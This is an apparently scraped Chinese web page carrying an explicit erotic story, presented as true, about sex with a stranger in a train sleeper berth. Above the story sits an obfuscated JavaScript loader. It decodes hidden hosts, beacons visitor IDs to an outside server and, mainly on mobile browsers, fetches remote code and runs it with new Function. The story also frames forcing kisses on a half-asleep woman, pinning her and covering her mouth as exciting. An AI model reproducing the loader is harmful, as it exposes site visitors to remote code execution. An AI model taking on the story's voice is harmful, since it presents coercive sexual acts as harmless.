function famkOu(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function RGipPz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return famkOu(t);};window[''+'M'+'F'+'N'+'j'+'O'+'d'+'f'+'l'+'a'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=RGipPz,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://phm.jtvpeuu.com:7891/stats/14518/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZlcnEudHV3aGV3Zi55jb20lM0E4ODkx','d3NNzJTNNBJTJGJTJGdGd1LmNN6dHJ4eC5jb20lM0E5NNTMz','164052',window,document,['5','N']);}:function(){};
  • 当前位置
  • 首页
  • 真实体验
    • 『【卧铺车厢惊喜多(依旧亲身经历)】 【tian010850】』
        作者:tian010850
      字数:5441


      火车三部曲——之卧铺车厢惊喜多

      我是个讲故事的人。——诺贝尔奖得主莫言

      上次说了我在硬座车厢的经历,肯定会有朋友会说以后都要做硬座什么的,
      那我想用一句话回复「生活不是缺乏美,而是缺乏发现美的眼睛」,无论是硬座
      车厢还是卧铺车厢,只要你善于发现和利用总是有收获的。

      有机会要上,没有机会创造机会也要上。

      暑假了,准备买车票回家,从学校到家里20多个小时,这次是真心准备买
      卧铺了,结果没买到,只能买了个硬座,一上车我就去找列车员排队补卧铺,列
      车员那个态度我就不细说了,一副老子天下第一的事态。坐了近六个小时的火车,
      已经是半夜两点终于排队等到卧铺了,拿到票我一是上铺就马上问列车员,「有
      中铺吗?」我都没敢说下铺,结果他说:「有你睡的就不错了,你要不要,不要
      我给别人了。」我只想说,他长的真有中国特色。

      反正有卧铺了,我提上行李就奔卧铺车厢走,感觉走了好远,终于到了我的
      车厢,因为是半夜两点,车厢黑灯瞎火的,我就一个一个对号,终于找到了我的
      铺,心里舒了一个口气,低头一看,下面几个铺都有人,抬头一看,我对面的铺
      上空的,我的铺上被子已经散扑在床上,估计是之前睡的人刚走吧。没多想,放
      好行李,就急忙往上爬。爬到上面我一看,怎么感觉被子里好像有人,刚才核对
      的很仔细,应该不会错。我一个手扶着护栏,一条腿先上了床,感觉被子里确实
      有人,我就试着推了一把,结果没反应,我就另一条腿也上了床,跪在床边,身
      子往前探了探,手够到肩又推了两下,说「朋友,我这我的铺,你可能睡错地方
      了。」见没反应,我刚准备再往前探身子的时候,突然这人转过身子,迷迷糊糊
      的「?」了一声。我一听还是个女的,我身子就往后撤了一下,压低声音说:
      「你睡错了吧,这个铺是我的。」

      她好像清醒一点了,说:「你睡旁边的吧。可能我上来的时候没注意。」

      「你哪站下?我们的站不一样,你还是过去吧。」因为我实在想睡个好觉,
      不想被换票之类的事吵醒打搅我睡觉。

      「不嘛,我都已经睡下了,你过去就行了,我在XXX下。」她侧着身子和
      我说。

      「我们在不同的站下车,到时候换票什么的麻烦,你还是回你的床上吧。」
      我心想怎么有这样的女人,睡错地方,还理智气壮。因为我刚才跪在床边那么小
      的面积太累了,说话的中间我已经把我两腿分夸在她上面,两个手支撑着身体在
      她上面。

      那女扭正身子,把被子突然从头上一掀,撒娇一般,用睡梦中慵懒的声音闭
      着眼睛说「不嘛,不嘛,人家就不换,我不换。」边说两条腿还不停蹬被子,手
      紧紧的攥着被她拉到胸口的被子。透过忽明忽暗的光线可以看到这女子园园的脸,
      嘴唇稍厚,白嫩的香肩,虽然被子盖着胸,但只穿了吊带,露来的部分就开始有
      胸型的起伏,应该不小。小狼算是没经验的,可能老狼一看就知道胸围多少了。
      罪恶的邪念啊,不过当时真没想吃到她。

      就这样僵持了半分钟,我想想算了,反正人家都睡下了,自己去旁边睡吧,
      反正她到站也是白天了,希望不要影响我休息。就在我刚起身准备离开的时候,
      突然一辆火车疾驰而过,列车由于两车错车时的中空低压突然抖动一下。我不知
      道是自己胳膊刚才支撑的太久没力气了,还是车真的抖动的太厉害,还是刚才的
      邪念促使我完成了下面动作。就在车抖动的一霎那,我刚好胳膊放松,整个身体
      压在了她上面,嘴硬生生亲了上去。直到现在回想起来,我还是不知道当时是怎
      么就亲上去的,而且还正好亲到嘴上。

      她的嘴被我堵着,「呜呜」两声后,我意识到不对,赶紧起身。她瞪大了双
      眼,直勾勾的看着我,当时我感觉周围就像白天,她彻底清(亲)醒了,我们都
      清楚的看着对方,手足无措,秉着呼吸,全世界在那一刻凝固。看看我身下这个
      女孩,大眼睛,白皮肤,我该怎么办,我的脑袋像一锅沸水一样在翻腾。这时候,
      她轻轻舔了一下嘴唇,可能是我上来前刚喝了一罐可乐,嘴里都是可乐的味道,
      亲到她嘴里她还在回味。我灵机一动,就问她:「嗯……那个……你是不是睡觉
      睡的口干啊?」她回答:「嗯……」嗯字还没说完,我直接果断出击,深深的吻
      了上去,舌头在她嘴里不停的打转,寻找那软滑的香舌。她的手想抓,但无奈上
      铺的空间太小,她的腿想蹬,但是被我腿紧紧的压住,我不知道她是不是想喊,
      因为两个舌头已经缠绕在一起。我使劲包裹着她的香舌,吞吐着两个人的津液,
      这女孩的舌头好软,感觉像嘴里含的棉花糖一样。猛烈亲吻了一会后,我突然停
      下,起身,定住,问她,「你还嘴干吗?」她表情迥异,想骂,想喊,但是又被
      我的问题给卡主了,眼睛上翻了一下,好像在思考怎么回答我问题。胸口快速巨
      大的起伏着,一个手紧紧的握着护栏。在她还在想怎么回答的时候,我缓缓俯下
      身子又亲了上去,边亲边用手拉开被子,抚摸着她的胳膊和肩膀,慢慢的把她的
      手从护栏上拿下,自然的放在床边,这次明显她好像不在抗拒,慢慢放松了,舌
      头开始配合着我的节奏。我的手慢慢开始忙碌,伸进被子摸她的身体,她上身穿
      的一件吊带,里面还带了乳罩,我的手又从上面摸她的奶子。我担心碰到她一些
      敏感部位叫出来,我就先隔着奶罩揉捏,揉捏了一会,感觉她没抗拒,才把手伸
      进奶罩里摸,和我刚才看到的没错,确实很大,我的手算比较大的,一个手抓不
      满,借用德芙巧克力的广告词形容这个胸,「如丝般顺滑」。开始我只是用手任
      意揉捏整个胸。后来,我随意用手轻轻捏了一下乳头,她迅速用手捂住了嘴,兴
      奋的想要叫出声来。哈哈,我还发现了她个敏感点,我要好好玩了。细心的朋友
      可能发现,我一直都是一直手和嘴在动作,因为另一直手一直在支撑的我的身体,
      差点没把我累死,这时候就是真正考验男人力量的时候啊!后悔上学的时候锻炼
      的太少。

      我环顾四周,确定下面几个铺都睡很熟后,就把我的身体移到床的外侧,她
      往里靠,我们面对面,此时我的整个身体终于躺到了床上,刚才胳膊像快要断掉
      一样。我一个手揉捏着胸,一个手在她身体上游走,慢慢的我的手摸到了大腿,
      光滑细腻。令我困惑的是,我一直找她内裤想扒下来,可是滑来滑去没找到,我
      突然意识到,刚才她为什么说不换床的时候那么无赖的坚决,原来她下面只穿了
      一个裙子,里面就什么都没有了。狼群们,千万别流口水啊。我也不知道会是这
      情况。

      当我想把我腿伸到她腿中间的时候,她推了推我,小声说:「凉。」我才明
      白原来我还穿着牛仔裤,赶紧脱了之后把我的腿伸到她两腿中间,两双腿完全的
      接触,忍不住婆娑起来,光滑棉润。支起她一条腿,我的手毫无阻碍的盖在了那
      密林上,开始她下面,她激动的腿一颤一颤的,我附身亲她的mimi,她开始
      兴奋了,用手紧紧捂着嘴。我似乎忘了这事在火车的卧铺上,上下一起刺激,把
      手放在阴道口一摸,一条大河向东流啊!我手想慢慢的挑逗她,可是没想到洞口
      水太多自己就滑进去了,「噗嗤噗嗤」随着我手的抽动,里面传来阵阵响声,可
      能她也才刺激了,一直想蹬开被子,我本来想直接把被子扔到对面床上,可是又
      一想万一人突然过来,被子还可以挡一下,起码不会明显看到一个铺趟着两个人,
      于是我把被子完全掀开,塞到了床里边。在这狭小空间,被子还占据了一部分地
      方。

      她的一条腿侧的张开,裙子刚好滑到腰间,整个屁股和腿都暴露在外面。上
      面的吊带已经被我折腾的面目全非,乳罩带子已经解开,但是还在上面没脱下来,
      地方太小,实在顾不上再管琐碎。我的手快速的抽动着,感觉她里面热热的,身
      子一直向上顶,一直手已经在拉我的手了,但还不坚决。我嘴上含咬着乳头,下
      面的手加快了速度,「啊……啊」她居然叫出声来,两只手从嘴上移开想拉我的
      手,里面的肌肉急速收缩,好像要把我手都吸进去一样,紧接着一股液体喷涌出
      来,把我的手也拱了出来,两腿合紧,瘫倒在我怀里。靠,我还是头一会把人玩
      喷了,居然是在火车上和不认识的人,激动的我后背都被汗浸湿了。到现在我都
      不知道她当时喷的那是尿还是其他的什么东西。估计老狼们都有自己的判断。我
      定住半分钟,她呼呼喘着粗气。她啊的那声,我冷汗都冒出来了。扭头看地下的
      人,最主要的是看我对面的中铺,因为他虽然看到是我的背阴,但是稍一留意就
      能看到那女孩抬起的大腿。她软绵绵的靠在我怀里,我的手缓慢的在她阴道理散
      步,随意点着阴道逼的褶皱,就像小姑娘来到大自然采野花一样,这里采一只,
      那里采一只。不经意间,她的手开始慢慢伸向了我的下面,寻觅她内心期待已久
      肉图腾。我顿时凝固了,这什么情况,怎么她还要继续?我当时以为故事到这就
      结束了,当初也没说要深入交流啊。

      她纤细的小手一下一下摸着我的JJ,不一会拉着我的JJ在她洞口蹭。我
      思想很兴奋,但体力很透支。我本来就是补卧铺睡觉的,已经很累了,加上刚才
      这么一折腾,可能……小弟弟今天不给力啊,怎么都不够硬,我爬起身从上面进
      入,试了两下居然没进去。加上上铺上部空间小,我还是半趴着,胳膊又累,就
      很烦躁,JJ更硬不起来了。我也不怕被笑话,这会丢人啊,之前的技巧和现在
      形成鲜明对比了,让人家以为只是手上功夫,真刀真枪就不行了。小狼一看这情
      况怎么能罢休,我和她说:「这样不行,这地方太小了,要不我们下去,不行就
      去洗手间吧。」

      她果断的说:「不行,我爸在下面。」靠,亲哥哥啊!这句绝对把我雷到了,
      她爸居然在下铺,而且还有她表姐,在我们对面的中铺。她怕到下去会吵醒她爸。
      我一听这话,顿时心跳加速,血管收缩,全身3万6千根汗毛剑拔弩张,JJ一
      下硬了,哈哈!这个世界就这么神奇。我还是侧趟在了外面,我让她背对我,捧
      起她的大屁股,这时她赶紧双手捂住嘴,等待我的插入。我拔枪就刺,「啊,好
      大……好大啊」可能太兴奋了,也可能是洞口太光滑,刺的比较深,她还是轻轻
      叫出了声。「啊……」我也倒吸一口气,好温暖的桃花源啊。我抓着大屁股就开
      始推送,一只手绕到前面抓这奶子,刚开始不敢太用力,因为怕出声,后来加快
      了速度,但还是床太窄了,感觉距离太短,于是我们换了姿势,我在上面,这下
      插的时候我慢慢插入,进去之后就开始加大幅度,还是这个姿势好,插的过瘾,
      而且她的腿不能像在平时床上做一样,能大大的张开,她只能分开放在铺上,所
      以里面特别紧,不过这姿势的缺点就是,不能把女生的腿张开,导致不能全部插
      入。而且这姿势真心消耗臂力和体力啊。但是刚才丢人了,这次怎么也要找补回
      来啊,我硬着头皮一下一下的开垦这肥沃的土地,插的专心而投入,里面的肉肉
      紧紧包裹着大鸡吧,高温,润滑,舒畅啊!插了不一会就听得有水声「噗滋噗滋
      的响」,正常情况这种响声能更让人兴奋,但这时候我们最怕的就是响声,听到
      有水声了,我就拔出来,她递给我纸巾,我把水吸一吸,再继续插。其中辛苦谁
      能了解!

      正在我们做的过瘾的时候,突然脚步声一步一步传来,这时候庆幸被子就在
      手旁边。我赶紧拉过被子盖住脚,俯下身子紧紧的和她胸挨着,JJ在她阴道里
      的时候,我还故意跳跳,她惊恐的和我皱皱眉头。哈哈!很有啊!等人过去不是
      麻烦,关键还要等他返回来,那个时间真漫长啊!中间我就一直和她热吻,亲咪
      咪,一直到人返回来听不到脚步声,我们才又干起来。在上面实在太累,又换侧
      卧后入式,这回插的跟猛烈了,她想叫床又不敢叫出声,但已经不用手捂嘴了,
      我使劲摇着她的大屁股,想着下面就是她爹,兴奋的大鸡巴特别硬,她时不时的
      就小声说,「好大……好大……啊……啊」,「爽……啊……要呢要呢」我更加
      大了力度和速度,用我的手捂住了她的嘴,使劲的抽查。不过虽然说是使劲,但
      毕竟空间有限,而且也不敢动静太大,所以还是有控制的。我感觉她下面又在收
      缩,我一次次直顶花心,就感觉我整个腿的肌肉紧绷,她也兴奋的用手抓着我的
      手,又猛插几下,这时候我们已经不管周围有没有人被吵醒了,她里面一紧,
      「啊」一股股浓精射进了这个我一点都不认识的女生体内。可能太激动了,射精
      完JJ久久还在她体内直立着。我也不舍得拔出去,床上的单子几乎全湿了,也
      分不清哪是汗水,哪是淫液。我们就随便擦了一下,我穿好内裤,就抱着她,用
      手摸着她的咪咪。

      我一觉醒来,已经过了中午,发现她已经在下面和她父亲,还有表姐聊天了。
      对面的床被子散开,我想可能她后来去那个床睡了吧。我肚子早已饿的不行,头
      晕晕的从上面下来,我正犹豫该不该和她打招呼的时候,她反而先和说话,「饿
      了吧,吃个苹果吧!」直接把一个刚洗好的苹果塞我手里,同时另一个苹果塞给
      了她爸。靠,小弟我从来没见过这是什么迷魂阵啊,我看着手里的苹果差点没激
      动的哭出来。这不会是看上我了吧,后来证明是我多虑了。他爸很诧异的问,
      「你们认识?」「恩,他昨天晚上补票上了的,我们就聊了一会。」她抢话回答
      到。她爸爸边噢边点点头。之后我和她爸聊了一会,但是我目光从来不敢正视她
      爸,因为每次看她爸,我脑子里就浮现昨天晚上干她女儿的情景。和她爸聊了一
      会之后,她爸爸要去打开水。我借这个空当问了一个我迫不及待想知道的问题,
      我问她:「你睡觉下面怎么不穿内裤啊?」她说:「我外面穿了,本来里面就没
      穿不要紧。晚上睡觉穿的丝袜不舒服,我才脱了的,可是里面就……」我低头一
      看,大家能看到的是她的丝袜腿,而我看到的是没有穿内裤赤裸裸的翘臀。

      我自己吃过午饭后,就和她们一直聊天,聊了挺多,谁也没再提昨晚的事。
      她比我早几站下车,下车前我们互相留了*****,但最后谁也没有再联系过,
      现在她的*****早已找不到了。留下的只有那一抹黑夜里疾驰而过的列车发出
      的亮色。

      后记:为了真正让小说微一些,让大家看的省事一些,里面有很多对话我都
      省去了,只保留了故事发生的主要内容,比如什么时候解开的奶罩我就不交代了
      哈。也许不够详细和精彩,但整体过程已经展现。相比硬座车厢,我觉的还是卧
      铺里面可能发生的惊喜或者意外多些吧!共勉之。